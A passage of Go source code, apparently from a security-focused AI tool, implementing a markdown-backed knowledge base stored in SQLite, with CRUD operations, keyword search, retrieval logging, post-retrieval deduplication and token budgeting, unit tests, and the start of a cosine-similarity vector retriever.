}
// NewManager 创建新的知识库管理器
func NewManager(db *sql.DB, basePath string, logger *zap.Logger) *Manager {
return &Manager{
db: db,
basePath: basePath,
logger: logger,
}
}
// ScanKnowledgeBase 扫描知识库目录,更新数据库
// 返回需要索引的知识项ID列表(新添加的或更新的)
func (m *Manager) ScanKnowledgeBase() ([]string, error) {
if m.basePath == "" {
return nil, fmt.Errorf("知识库路径未配置")
}
// 确保目录存在
if err := os.MkdirAll(m.basePath, 0755); err != nil {
return nil, fmt.Errorf("创建知识库目录失败: %w", err)
}
var itemsToIndex []string
// 遍历知识库目录
err := filepath.WalkDir(m.basePath, func(path string, d fs.DirEntry, err error) error {
if err != nil {
return err
}
// 跳过目录和非markdown文件
if d.IsDir() || !strings.HasSuffix(strings.ToLower(path), ".md") {
return nil
}
// 计算相对路径和分类
relPath, err := filepath.Rel(m.basePath, path)
if err != nil {
return err
}
// 第一个目录名作为分类(风险类型)
parts := strings.Split(relPath, string(filepath.Separator))
category := "未分类"
if len(parts) > 1 {
category = parts[0]
}
// 文件名为标题
title := strings.TrimSuffix(filepath.Base(path), ".md")
// 读取文件内容
content, err := os.ReadFile(path)
if err != nil {
m.logger.Warn("读取知识库文件失败", zap.String("path", path), zap.Error(err))
return nil // 继续处理其他文件
}
// 检查是否已存在
var existingID string
var existingContent string
var existingUpdatedAt time.Time
err = m.db.QueryRow(
"SELECT id, content, updated_at FROM knowledge_base_items WHERE file_path = ?",
path,
).Scan(&existingID, &existingContent, &existingUpdatedAt)
if err == sql.ErrNoRows {
// 创建新项
id := uuid.New().String()
now := time.Now()
_, err = m.db.Exec(
"INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)",
id, category, title, path, string(content), now, now,
)
if err != nil {
return fmt.Errorf("插入知识项失败: %w", err)
}
m.logger.Info("添加知识项", zap.String("id", id), zap.String("title", title), zap.String("category", category))
// 新添加的项需要索引
itemsToIndex = append(itemsToIndex, id)
} else if err == nil {
// 检查内容是否有变化
contentChanged := existingContent != string(content)
if contentChanged {
// 更新现有项
_, err = m.db.Exec(
"UPDATE knowledge_base_items SET category = ?, title = ?, content = ?, updated_at = ? WHERE id = ?",
category, title, string(content), time.Now(), existingID,
)
if err != nil {
return fmt.Errorf("更新知识项失败: %w", err)
}
m.logger.Info("更新知识项", zap.String("id", existingID), zap.String("title", title))
// 内容已更新的项需要重新索引
itemsToIndex = append(itemsToIndex, existingID)
} else {
m.logger.Debug("知识项未变化,跳过", zap.String("id", existingID), zap.String("title", title))
}
} else {
return fmt.Errorf("查询知识项失败: %w", err)
}
return nil
})
if err != nil {
return nil, err
}
return itemsToIndex, nil
}
// GetCategories 获取所有分类(风险类型)
func (m *Manager) GetCategories() ([]string, error) {
rows, err := m.db.Query("SELECT DISTINCT category FROM knowledge_base_items ORDER BY category")
if err != nil {
return nil, fmt.Errorf("查询分类失败: %w", err)
}
defer rows.Close()
var categories []string
for rows.Next() {
var category string
if err := rows.Scan(&category); err != nil {
return nil, fmt.Errorf("扫描分类失败: %w", err)
}
categories = append(categories, category)
}
return categories, nil
}
// GetStats 获取知识库统计信息
func (m *Manager) GetStats() (int, int, error) {
// 获取分类总数
categories, err := m.GetCategories()
if err != nil {
return 0, 0, fmt.Errorf("获取分类失败: %w", err)
}
totalCategories := len(categories)
// 获取知识项总数
var totalItems int
err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems)
if err != nil {
return totalCategories, 0, fmt.Errorf("获取知识项总数失败: %w", err)
}
return totalCategories, totalItems, nil
}
// GetCategoriesWithItems 按分类分页获取知识项(每个分类包含其下的所有知识项)
// limit: 每页分类数量(0表示不限制)
// offset: 偏移量(按分类偏移)
func (m *Manager) GetCategoriesWithItems(limit, offset int) ([]*CategoryWithItems, int, error) {
// 首先获取所有分类(带数量统计)
rows, err := m.db.Query(`
SELECT category, COUNT(*) as item_count
FROM knowledge_base_items
GROUP BY category
ORDER BY category
`)
if err != nil {
return nil, 0, fmt.Errorf("查询分类失败: %w", err)
}
defer rows.Close()
// 收集所有分类信息
type categoryInfo struct {
name string
itemCount int
}
var allCategories []categoryInfo
for rows.Next() {
var info categoryInfo
if err := rows.Scan(&info.name, &info.itemCount); err != nil {
return nil, 0, fmt.Errorf("扫描分类失败: %w", err)
}
allCategories = append(allCategories, info)
}
totalCategories := len(allCategories)
// 应用分页(按分类分页)
var paginatedCategories []categoryInfo
if limit > 0 {
start := offset
end := offset + limit
if start >= totalCategories {
paginatedCategories = []categoryInfo{}
} else {
if end > totalCategories {
end = totalCategories
}
paginatedCategories = allCategories[start:end]
}
} else {
paginatedCategories = allCategories
}
// 为每个分类获取其下的知识项(只返回摘要,不包含完整内容)
result := make([]*CategoryWithItems, 0, len(paginatedCategories))
for _, catInfo := range paginatedCategories {
// 获取该分类下的所有知识项
items, _, err := m.GetItemsSummary(catInfo.name, 0, 0)
if err != nil {
return nil, 0, fmt.Errorf("获取分类 %s 的知识项失败: %w", catInfo.name, err)
}
result = append(result, &CategoryWithItems{
Category: catInfo.name,
ItemCount: catInfo.itemCount,
Items: items,
})
}
return result, totalCategories, nil
}
// GetItems 获取知识项列表(完整内容,用于向后兼容)
func (m *Manager) GetItems(category string) ([]*KnowledgeItem, error) {
return m.GetItemsWithOptions(category, 0, 0, true)
}
// GetItemsWithOptions 获取知识项列表(支持分页和可选内容)
// category: 分类筛选(空字符串表示所有分类)
// limit: 每页数量(0表示不限制)
// offset: 偏移量
// includeContent: 是否包含完整内容(false时只返回摘要)
func (m *Manager) GetItemsWithOptions(category string, limit, offset int, includeContent bool) ([]*KnowledgeItem, error) {
var rows *sql.Rows
var err error
// 构建SQL查询
var query string
var args []interface{}
if includeContent {
query = "SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items"
} else {
query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items"
}
if category != "" {
query += " WHERE category = ?"
args = append(args, category)
}
query += " ORDER BY category, title"
if limit > 0 {
query += " LIMIT ?"
args = append(args, limit)
if offset > 0 {
query += " OFFSET ?"
args = append(args, offset)
}
}
rows, err = m.db.Query(query, args...)
if err != nil {
return nil, fmt.Errorf("查询知识项失败: %w", err)
}
defer rows.Close()
var items []*KnowledgeItem
for rows.Next() {
item := &KnowledgeItem{}
var createdAt, updatedAt string
if includeContent {
if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt); err != nil {
return nil, fmt.Errorf("扫描知识项失败: %w", err)
}
} else {
if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil {
return nil, fmt.Errorf("扫描知识项失败: %w", err)
}
// 不包含内容时,Content为空字符串
item.Content = ""
}
// 解析时间 - 支持多种格式
timeFormats := []string{
"2006-01-02 15:04:05.999999999-07:00",
"2006-01-02 15:04:05.999999999",
"2006-01-02T15:04:05.999999999Z07:00",
"2006-01-02T15:04:05Z",
"2006-01-02 15:04:05",
time.RFC3339,
time.RFC3339Nano,
}
// 解析创建时间
if createdAt != "" {
for _, format := range timeFormats {
parsed, err := time.Parse(format, createdAt)
if err == nil && !parsed.IsZero() {
item.CreatedAt = parsed
break
}
}
}
// 解析更新时间
if updatedAt != "" {
for _, format := range timeFormats {
parsed, err := time.Parse(format, updatedAt)
if err == nil && !parsed.IsZero() {
item.UpdatedAt = parsed
break
}
}
}
// 如果更新时间为空,使用创建时间
if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() {
item.UpdatedAt = item.CreatedAt
}
items = append(items, item)
}
return items, nil
}
// GetItemsCount 获取知识项总数
func (m *Manager) GetItemsCount(category string) (int, error) {
var count int
var err error
if category != "" {
err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items WHERE category = ?", category).Scan(&count)
} else {
err = m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&count)
}
if err != nil {
return 0, fmt.Errorf("查询知识项总数失败: %w", err)
}
return count, nil
}
// SearchItemsByKeyword 按关键字搜索知识项(在所有数据中搜索,支持标题、分类、路径、内容匹配)
func (m *Manager) SearchItemsByKeyword(keyword string, category string) ([]*KnowledgeItemSummary, error) {
if keyword == "" {
return nil, fmt.Errorf("搜索关键字不能为空")
}
// 构建SQL查询,使用LIKE进行关键字匹配(不区分大小写)
var query string
var args []interface{}
// SQLite的LIKE不区分大小写,使用COLLATE NOCASE或LOWER()函数
// 使用%keyword%进行模糊匹配
searchPattern := "%" + keyword + "%"
query = `
SELECT id, category, title, file_path, created_at, updated_at
FROM knowledge_base_items
WHERE (LOWER(title) LIKE LOWER(?) OR LOWER(category) LIKE LOWER(?) OR LOWER(file_path) LIKE LOWER(?) OR LOWER(content) LIKE LOWER(?))
`
args = append(args, searchPattern, searchPattern, searchPattern, searchPattern)
// 如果指定了分类,添加分类过滤
if category != "" {
query += " AND category = ?"
args = append(args, category)
}
query += " ORDER BY category, title"
rows, err := m.db.Query(query, args...)
if err != nil {
return nil, fmt.Errorf("搜索知识项失败: %w", err)
}
defer rows.Close()
var items []*KnowledgeItemSummary
for rows.Next() {
item := &KnowledgeItemSummary{}
var createdAt, updatedAt string
if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil {
return nil, fmt.Errorf("扫描知识项失败: %w", err)
}
// 解析时间
timeFormats := []string{
"2006-01-02 15:04:05.999999999-07:00",
"2006-01-02 15:04:05.999999999",
"2006-01-02T15:04:05.999999999Z07:00",
"2006-01-02T15:04:05Z",
"2006-01-02 15:04:05",
time.RFC3339,
time.RFC3339Nano,
}
if createdAt != "" {
for _, format := range timeFormats {
parsed, err := time.Parse(format, createdAt)
if err == nil && !parsed.IsZero() {
item.CreatedAt = parsed
break
}
}
}
if updatedAt != "" {
for _, format := range timeFormats {
parsed, err := time.Parse(format, updatedAt)
if err == nil && !parsed.IsZero() {
item.UpdatedAt = parsed
break
}
}
}
if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() {
item.UpdatedAt = item.CreatedAt
}
items = append(items, item)
}
return items, nil
}
// GetItemsSummary 获取知识项摘要列表(不包含完整内容,支持分页)
func (m *Manager) GetItemsSummary(category string, limit, offset int) ([]*KnowledgeItemSummary, int, error) {
// 获取总数
total, err := m.GetItemsCount(category)
if err != nil {
return nil, 0, err
}
// 获取列表数据(不包含内容)
var rows *sql.Rows
var query string
var args []interface{}
query = "SELECT id, category, title, file_path, created_at, updated_at FROM knowledge_base_items"
if category != "" {
query += " WHERE category = ?"
args = append(args, category)
}
query += " ORDER BY category, title"
if limit > 0 {
query += " LIMIT ?"
args = append(args, limit)
if offset > 0 {
query += " OFFSET ?"
args = append(args, offset)
}
}
rows, err = m.db.Query(query, args...)
if err != nil {
return nil, 0, fmt.Errorf("查询知识项失败: %w", err)
}
defer rows.Close()
var items []*KnowledgeItemSummary
for rows.Next() {
item := &KnowledgeItemSummary{}
var createdAt, updatedAt string
if err := rows.Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &createdAt, &updatedAt); err != nil {
return nil, 0, fmt.Errorf("扫描知识项失败: %w", err)
}
// 解析时间
timeFormats := []string{
"2006-01-02 15:04:05.999999999-07:00",
"2006-01-02 15:04:05.999999999",
"2006-01-02T15:04:05.999999999Z07:00",
"2006-01-02T15:04:05Z",
"2006-01-02 15:04:05",
time.RFC3339,
time.RFC3339Nano,
}
if createdAt != "" {
for _, format := range timeFormats {
parsed, err := time.Parse(format, createdAt)
if err == nil && !parsed.IsZero() {
item.CreatedAt = parsed
break
}
}
}
if updatedAt != "" {
for _, format := range timeFormats {
parsed, err := time.Parse(format, updatedAt)
if err == nil && !parsed.IsZero() {
item.UpdatedAt = parsed
break
}
}
}
if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() {
item.UpdatedAt = item.CreatedAt
}
items = append(items, item)
}
return items, total, nil
}
// GetItem 获取单个知识项
func (m *Manager) GetItem(id string) (*KnowledgeItem, error) {
item := &KnowledgeItem{}
var createdAt, updatedAt string
err := m.db.QueryRow(
"SELECT id, category, title, file_path, content, created_at, updated_at FROM knowledge_base_items WHERE id = ?",
id,
).Scan(&item.ID, &item.Category, &item.Title, &item.FilePath, &item.Content, &createdAt, &updatedAt)
if err == sql.ErrNoRows {
return nil, fmt.Errorf("知识项不存在")
}
if err != nil {
return nil, fmt.Errorf("查询知识项失败: %w", err)
}
// 解析时间 - 支持多种格式
timeFormats := []string{
"2006-01-02 15:04:05.999999999-07:00",
"2006-01-02 15:04:05.999999999",
"2006-01-02T15:04:05.999999999Z07:00",
"2006-01-02T15:04:05Z",
"2006-01-02 15:04:05",
time.RFC3339,
time.RFC3339Nano,
}
// 解析创建时间
if createdAt != "" {
for _, format := range timeFormats {
parsed, err := time.Parse(format, createdAt)
if err == nil && !parsed.IsZero() {
item.CreatedAt = parsed
break
}
}
}
// 解析更新时间
if updatedAt != "" {
for _, format := range timeFormats {
parsed, err := time.Parse(format, updatedAt)
if err == nil && !parsed.IsZero() {
item.UpdatedAt = parsed
break
}
}
}
// 如果更新时间为空,使用创建时间
if item.UpdatedAt.IsZero() && !item.CreatedAt.IsZero() {
item.UpdatedAt = item.CreatedAt
}
return item, nil
}
// CreateItem 创建知识项
func (m *Manager) CreateItem(category, title, content string) (*KnowledgeItem, error) {
id := uuid.New().String()
now := time.Now()
// 构建文件路径
filePath := filepath.Join(m.basePath, category, title+".md")
// 确保目录存在
if err := os.MkdirAll(filepath.Dir(filePath), 0755); err != nil {
return nil, fmt.Errorf("创建目录失败: %w", err)
}
// 写入文件
if err := os.WriteFile(filePath, []byte(content), 0644); err != nil {
return nil, fmt.Errorf("写入文件失败: %w", err)
}
// 插入数据库
_, err := m.db.Exec(
"INSERT INTO knowledge_base_items (id, category, title, file_path, content, created_at, updated_at) VALUES (?, ?, ?, ?, ?, ?, ?)",
id, category, title, filePath, content, now, now,
)
if err != nil {
return nil, fmt.Errorf("插入知识项失败: %w", err)
}
return &KnowledgeItem{
ID: id,
Category: category,
Title: title,
FilePath: filePath,
Content: content,
CreatedAt: now,
UpdatedAt: now,
}, nil
}
// UpdateItem 更新知识项
func (m *Manager) UpdateItem(id, category, title, content string) (*KnowledgeItem, error) {
// 获取现有项
item, err := m.GetItem(id)
if err != nil {
return nil, err
}
// 构建新文件路径
newFilePath := filepath.Join(m.basePath, category, title+".md")
// 如果路径改变,需要移动文件
if item.FilePath != newFilePath {
// 确保新目录存在
if err := os.MkdirAll(filepath.Dir(newFilePath), 0755); err != nil {
return nil, fmt.Errorf("创建目录失败: %w", err)
}
// 移动文件
if err := os.Rename(item.FilePath, newFilePath); err != nil {
return nil, fmt.Errorf("移动文件失败: %w", err)
}
// 删除旧目录(如果为空)
oldDir := filepath.Dir(item.FilePath)
if isEmpty, _ := isEmptyDir(oldDir); isEmpty {
// 只有当目录不是知识库根目录时才删除(避免删除根目录)
if oldDir != m.basePath {
if err := os.Remove(oldDir); err != nil {
m.logger.Warn("删除空目录失败", zap.String("dir", oldDir), zap.Error(err))
}
}
}
}
// 写入文件
if err := os.WriteFile(newFilePath, []byte(content), 0644); err != nil {
return nil, fmt.Errorf("写入文件失败: %w", err)
}
// 更新数据库
_, err = m.db.Exec(
"UPDATE knowledge_base_items SET category = ?, title = ?, file_path = ?, content = ?, updated_at = ? WHERE id = ?",
category, title, newFilePath, content, time.Now(), id,
)
if err != nil {
return nil, fmt.Errorf("更新知识项失败: %w", err)
}
// 删除旧的向量嵌入(需要重新索引)
_, err = m.db.Exec("DELETE FROM knowledge_embeddings WHERE item_id = ?", id)
if err != nil {
m.logger.Warn("删除旧向量嵌入失败", zap.Error(err))
}
return m.GetItem(id)
}
// DeleteItem 删除知识项
func (m *Manager) DeleteItem(id string) error {
// 获取文件路径
var filePath string
err := m.db.QueryRow("SELECT file_path FROM knowledge_base_items WHERE id = ?", id).Scan(&filePath)
if err != nil {
return fmt.Errorf("查询知识项失败: %w", err)
}
// 删除文件
if err := os.Remove(filePath); err != nil && !os.IsNotExist(err) {
m.logger.Warn("删除文件失败", zap.String("path", filePath), zap.Error(err))
}
// 删除数据库记录(级联删除向量)
_, err = m.db.Exec("DELETE FROM knowledge_base_items WHERE id = ?", id)
if err != nil {
return fmt.Errorf("删除知识项失败: %w", err)
}
// 删除空目录(如果为空)
dir := filepath.Dir(filePath)
if isEmpty, _ := isEmptyDir(dir); isEmpty {
// 只有当目录不是知识库根目录时才删除(避免删除根目录)
if dir != m.basePath {
if err := os.Remove(dir); err != nil {
m.logger.Warn("删除空目录失败", zap.String("dir", dir), zap.Error(err))
}
}
}
return nil
}
// isEmptyDir 检查目录是否为空(忽略隐藏文件和 . 开头的文件)
func isEmptyDir(dir string) (bool, error) {
entries, err := os.ReadDir(dir)
if err != nil {
return false, err
}
for _, entry := range entries {
// 忽略隐藏文件(以 . 开头)
if !strings.HasPrefix(entry.Name(), ".") {
return false, nil
}
}
return true, nil
}
// LogRetrieval 记录检索日志
func (m *Manager) LogRetrieval(conversationID, messageID, query, riskType string, retrievedItems []string) error {
id := uuid.New().String()
itemsJSON, _ := json.Marshal(retrievedItems)
_, err := m.db.Exec(
"INSERT INTO knowledge_retrieval_logs (id, conversation_id, message_id, query, risk_type, retrieved_items, created_at) VALUES (?, ?, ?, ?, ?, ?, ?)",
id, conversationID, messageID, query, riskType, string(itemsJSON), time.Now(),
)
return err
}
// GetIndexStatus 获取索引状态
func (m *Manager) GetIndexStatus() (map[string]interface{}, error) {
// 获取总知识项数
var totalItems int
err := m.db.QueryRow("SELECT COUNT(*) FROM knowledge_base_items").Scan(&totalItems)
if err != nil {
return nil, fmt.Errorf("查询总知识项数失败: %w", err)
}
// 获取已索引的知识项数(有向量嵌入的)
var indexedItems int
err = m.db.QueryRow(`
SELECT COUNT(DISTINCT item_id)
FROM knowledge_embeddings
`).Scan(&indexedItems)
if err != nil {
return nil, fmt.Errorf("查询已索引项数失败: %w", err)
}
// 计算进度百分比
var progressPercent float64
if totalItems > 0 {
progressPercent = float64(indexedItems) / float64(totalItems) * 100
} else {
progressPercent = 100.0
}
// 判断是否完成
isComplete := indexedItems >= totalItems && totalItems > 0
return map[string]interface{}{
"total_items": totalItems,
"indexed_items": indexedItems,
"progress_percent": progressPercent,
"is_complete": isComplete,
}, nil
}
// GetRetrievalLogs 获取检索日志
func (m *Manager) GetRetrievalLogs(conversationID, messageID string, limit int) ([]*RetrievalLog, error) {
var rows *sql.Rows
var err error
if messageID != "" {
rows, err = m.db.Query(
"SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE message_id = ? ORDER BY created_at DESC LIMIT ?",
messageID, limit,
)
} else if conversationID != "" {
rows, err = m.db.Query(
"SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs WHERE conversation_id = ? ORDER BY created_at DESC LIMIT ?",
conversationID, limit,
)
} else {
rows, err = m.db.Query(
"SELECT id, conversation_id, message_id, query, risk_type, retrieved_items, created_at FROM knowledge_retrieval_logs ORDER BY created_at DESC LIMIT ?",
limit,
)
}
if err != nil {
return nil, fmt.Errorf("查询检索日志失败: %w", err)
}
defer rows.Close()
var logs []*RetrievalLog
for rows.Next() {
log := &RetrievalLog{}
var createdAt string
var itemsJSON sql.NullString
if err := rows.Scan(&log.ID, &log.ConversationID, &log.MessageID, &log.Query, &log.RiskType, &itemsJSON, &createdAt); err != nil {
return nil, fmt.Errorf("扫描检索日志失败: %w", err)
}
// 解析时间 - 支持多种格式
var err error
timeFormats := []string{
"2006-01-02 15:04:05.999999999-07:00",
"2006-01-02 15:04:05.999999999",
"2006-01-02T15:04:05.999999999Z07:00",
"2006-01-02T15:04:05Z",
"2006-01-02 15:04:05",
time.RFC3339,
time.RFC3339Nano,
}
for _, format := range timeFormats {
log.CreatedAt, err = time.Parse(format, createdAt)
if err == nil && !log.CreatedAt.IsZero() {
break
}
}
// 如果所有格式都失败,记录警告但继续处理
if log.CreatedAt.IsZero() {
m.logger.Warn("解析检索日志时间失败",
zap.String("timeStr", createdAt),
zap.Error(err),
)
// 使用当前时间作为fallback
log.CreatedAt = time.Now()
}
// 解析检索项
if itemsJSON.Valid {
json.Unmarshal([]byte(itemsJSON.String), &log.RetrievedItems)
}
logs = append(logs, log)
}
return logs, nil
}
// DeleteRetrievalLog 删除检索日志
func (m *Manager) DeleteRetrievalLog(id string) error {
result, err := m.db.Exec("DELETE FROM knowledge_retrieval_logs WHERE id = ?", id)
if err != nil {
return fmt.Errorf("删除检索日志失败: %w", err)
}
rowsAffected, err := result.RowsAffected()
if err != nil {
return fmt.Errorf("获取删除行数失败: %w", err)
}
if rowsAffected == 0 {
return fmt.Errorf("检索日志不存在")
}
return nil
}
+213
View File
@@ -0,0 +1,213 @@
package knowledge
import (
"context"
"crypto/sha256"
"encoding/hex"
"fmt"
"strings"
"sync"
"unicode"
"unicode/utf8"
"cyberstrike-ai/internal/config"
"github.com/cloudwego/eino/schema"
"github.com/pkoukk/tiktoken-go"
)
// postRetrieveMaxPrefetchCap 限制单次向量候选上限,避免误配置导致全表扫压力过大。
const postRetrieveMaxPrefetchCap = 200
// DocumentReranker 可选重排(如交叉编码器 / 第三方 Rerank API),由 [Retriever.SetDocumentReranker] 注入;失败时在适配层降级为向量序。
type DocumentReranker interface {
Rerank(ctx context.Context, query string, docs []*schema.Document) ([]*schema.Document, error)
}
// NopDocumentReranker 占位实现,便于测试或未启用重排时显式注入。
type NopDocumentReranker struct{}
// Rerank implements [DocumentReranker] as no-op.
func (NopDocumentReranker) Rerank(_ context.Context, _ string, docs []*schema.Document) ([]*schema.Document, error) {
return docs, nil
}
var tiktokenEncMu sync.Mutex
var tiktokenEncCache = map[string]*tiktoken.Tiktoken{}
func encodingForTokenizerModel(model string) (*tiktoken.Tiktoken, error) {
m := strings.TrimSpace(model)
if m == "" {
m = "gpt-4"
}
tiktokenEncMu.Lock()
defer tiktokenEncMu.Unlock()
if enc, ok := tiktokenEncCache[m]; ok {
return enc, nil
}
enc, err := tiktoken.EncodingForModel(m)
if err != nil {
enc, err = tiktoken.GetEncoding("cl100k_base")
if err != nil {
return nil, err
}
}
tiktokenEncCache[m] = enc
return enc, nil
}
func countDocTokens(text, model string) (int, error) {
enc, err := encodingForTokenizerModel(model)
if err != nil {
return 0, err
}
toks := enc.Encode(text, nil, nil)
return len(toks), nil
}
// normalizeContentFingerprintKey 去重键:trim + 空白折叠(不改动大小写,避免合并仅大小写不同的代码片段)。
func normalizeContentFingerprintKey(s string) string {
s = strings.TrimSpace(s)
var b strings.Builder
b.Grow(len(s))
prevSpace := false
for _, r := range s {
if unicode.IsSpace(r) {
if !prevSpace {
b.WriteByte(' ')
prevSpace = true
}
continue
}
prevSpace = false
b.WriteRune(r)
}
return b.String()
}
func contentNormKey(d *schema.Document) string {
if d == nil {
return ""
}
n := normalizeContentFingerprintKey(d.Content)
if n == "" {
return ""
}
sum := sha256.Sum256([]byte(n))
return hex.EncodeToString(sum[:])
}
// dedupeByNormalizedContent 按规范化正文去重,保留向量检索顺序中首次出现的文档(同正文仅保留一条)。
func dedupeByNormalizedContent(docs []*schema.Document) []*schema.Document {
if len(docs) < 2 {
return docs
}
seen := make(map[string]struct{}, len(docs))
out := make([]*schema.Document, 0, len(docs))
for _, d := range docs {
if d == nil {
continue
}
k := contentNormKey(d)
if k == "" {
out = append(out, d)
continue
}
if _, ok := seen[k]; ok {
continue
}
seen[k] = struct{}{}
out = append(out, d)
}
return out
}
// truncateDocumentsByBudget 按检索顺序整段保留文档,直至字符数或 token 数(任一启用)超限则停止。
func truncateDocumentsByBudget(docs []*schema.Document, maxRunes, maxTokens int, tokenModel string) ([]*schema.Document, error) {
if len(docs) == 0 {
return docs, nil
}
unlimitedChars := maxRunes <= 0
unlimitedTok := maxTokens <= 0
if unlimitedChars && unlimitedTok {
return docs, nil
}
remRunes := maxRunes
remTok := maxTokens
out := make([]*schema.Document, 0, len(docs))
for _, d := range docs {
if d == nil || strings.TrimSpace(d.Content) == "" {
continue
}
runes := utf8.RuneCountInString(d.Content)
if !unlimitedChars && runes > remRunes {
break
}
var tok int
var err error
if !unlimitedTok {
tok, err = countDocTokens(d.Content, tokenModel)
if err != nil {
return nil, fmt.Errorf("token count: %w", err)
}
if tok > remTok {
break
}
}
out = append(out, d)
if !unlimitedChars {
remRunes -= runes
}
if !unlimitedTok {
remTok -= tok
}
}
return out, nil
}
// EffectivePrefetchTopK 计算向量检索应拉取的候选条数(供粗排 / 去重 / 重排)。
func EffectivePrefetchTopK(topK int, po *config.PostRetrieveConfig) int {
if topK < 1 {
topK = 5
}
fetch := topK
if po != nil && po.PrefetchTopK > fetch {
fetch = po.PrefetchTopK
}
if fetch > postRetrieveMaxPrefetchCap {
fetch = postRetrieveMaxPrefetchCap
}
return fetch
}
// ApplyPostRetrieve 检索后处理:规范化正文去重 → 预算截断 → 最终 TopK。重排在 [VectorEinoRetriever] 中单独调用以便失败时降级。
func ApplyPostRetrieve(docs []*schema.Document, po *config.PostRetrieveConfig, tokenModel string, finalTopK int) ([]*schema.Document, error) {
if finalTopK < 1 {
finalTopK = 5
}
if len(docs) == 0 {
return docs, nil
}
maxChars := 0
maxTok := 0
if po != nil {
maxChars = po.MaxContextChars
maxTok = po.MaxContextTokens
}
out := dedupeByNormalizedContent(docs)
var err error
out, err = truncateDocumentsByBudget(out, maxChars, maxTok, tokenModel)
if err != nil {
return nil, err
}
if len(out) > finalTopK {
out = out[:finalTopK]
}
return out, nil
}
+62
View File
@@ -0,0 +1,62 @@
package knowledge
import (
"testing"
"cyberstrike-ai/internal/config"
"github.com/cloudwego/eino/schema"
)
func doc(id, content string, score float64) *schema.Document {
d := &schema.Document{ID: id, Content: content, MetaData: map[string]any{metaKBItemID: "it1"}}
d.WithScore(score)
return d
}
func TestDedupeByNormalizedContent(t *testing.T) {
a := doc("1", "hello world", 0.9)
b := doc("2", "hello world", 0.8)
c := doc("3", "other", 0.7)
out := dedupeByNormalizedContent([]*schema.Document{a, b, c})
if len(out) != 2 {
t.Fatalf("len=%d want 2", len(out))
}
if out[0].ID != "1" || out[1].ID != "3" {
t.Fatalf("order/ids wrong: %#v", out)
}
}
func TestEffectivePrefetchTopK(t *testing.T) {
if g := EffectivePrefetchTopK(5, nil); g != 5 {
t.Fatalf("got %d", g)
}
if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 50}); g != 50 {
t.Fatalf("got %d", g)
}
if g := EffectivePrefetchTopK(5, &config.PostRetrieveConfig{PrefetchTopK: 9999}); g != postRetrieveMaxPrefetchCap {
t.Fatalf("cap: got %d", g)
}
}
func TestApplyPostRetrieveTruncateAndTopK(t *testing.T) {
d1 := doc("1", "ab", 0.9)
d2 := doc("2", "cd", 0.8)
d3 := doc("3", "ef", 0.7)
po := &config.PostRetrieveConfig{MaxContextChars: 3}
out, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, po, "gpt-4", 5)
if err != nil {
t.Fatal(err)
}
if len(out) != 1 || out[0].ID != "1" {
t.Fatalf("got %#v", out)
}
out2, err := ApplyPostRetrieve([]*schema.Document{d1, d2, d3}, nil, "gpt-4", 2)
if err != nil {
t.Fatal(err)
}
if len(out2) != 2 {
t.Fatalf("topk: len=%d", len(out2))
}
}
+305
View File
@@ -0,0 +1,305 @@
package knowledge
import (
"context"
"database/sql"
"encoding/json"
"fmt"
"math"
"sort"
"strings"
"sync"
"cyberstrike-ai/internal/config"
"github.com/cloudwego/eino/components/retriever"
"github.com/cloudwego/eino/schema"
"go.uber.org/zap"
)
// Retriever 检索器:SQLite 存向量 + Eino 嵌入,**纯向量检索**(余弦相似度、TopK、阈值),
// 实现语义与 [retriever.Retriever] 适配层 [VectorEinoRetriever] 一致。
type Retriever struct {
db *sql.DB
embedder *Embedder
config *RetrievalConfig
logger *zap.Logger
rerankMu sync.RWMutex
reranker DocumentReranker
}
// RetrievalConfig 检索配置
type RetrievalConfig struct {
TopK int
SimilarityThreshold float64
// SubIndexFilter 非空时仅检索 sub_indexes 包含该标签(逗号分隔之一)的行;空 sub_indexes 的旧行仍保留以兼容。
SubIndexFilter string
PostRetrieve config.PostRetrieveConfig
}
// NewRetriever 创建新的检索器
func NewRetriever(db *sql.DB, embedder *Embedder, config *RetrievalConfig, logger *zap.Logger) *Retriever {
return &Retriever{
db: db,
embedder: embedder,
config: config,
logger: logger,
}
}
// UpdateConfig 更新检索配置
func (r *Retriever) UpdateConfig(cfg *RetrievalConfig) {
if cfg != nil {
r.config = cfg
if r.logger != nil {
r.logger.Info("检索器配置已更新",
zap.Int("top_k", cfg.TopK),
zap.Float64("similarity_threshold", cfg.SimilarityThreshold),
zap.String("sub_index_filter", cfg.SubIndexFilter),
zap.Int("post_retrieve_prefetch_top_k", cfg.PostRetrieve.PrefetchTopK),
zap.Int("post_retrieve_max_context_chars", cfg.PostRetrieve.MaxContextChars),
zap.Int("post_retrieve_max_context_tokens", cfg.PostRetrieve.MaxContextTokens),
)
}
}
}
// SetDocumentReranker 注入可选重排器(并发安全);nil 表示禁用。
func (r *Retriever) SetDocumentReranker(rr DocumentReranker) {
if r == nil {
return
}
r.rerankMu.Lock()
defer r.rerankMu.Unlock()
r.reranker = rr
}
func (r *Retriever) documentReranker() DocumentReranker {
if r == nil {
return nil
}
r.rerankMu.RLock()
defer r.rerankMu.RUnlock()
return r.reranker
}
func cosineSimilarity(a, b []float32) float64 {
if len(a) != len(b) {
return 0.0
}
var dotProduct, normA, normB float64
for i := range a {
dotProduct += float64(a[i] * b[i])
normA += float64(a[i] * a[i])
normB += float64(b[i] * b[i])
}
if normA == 0 || normB == 0 {
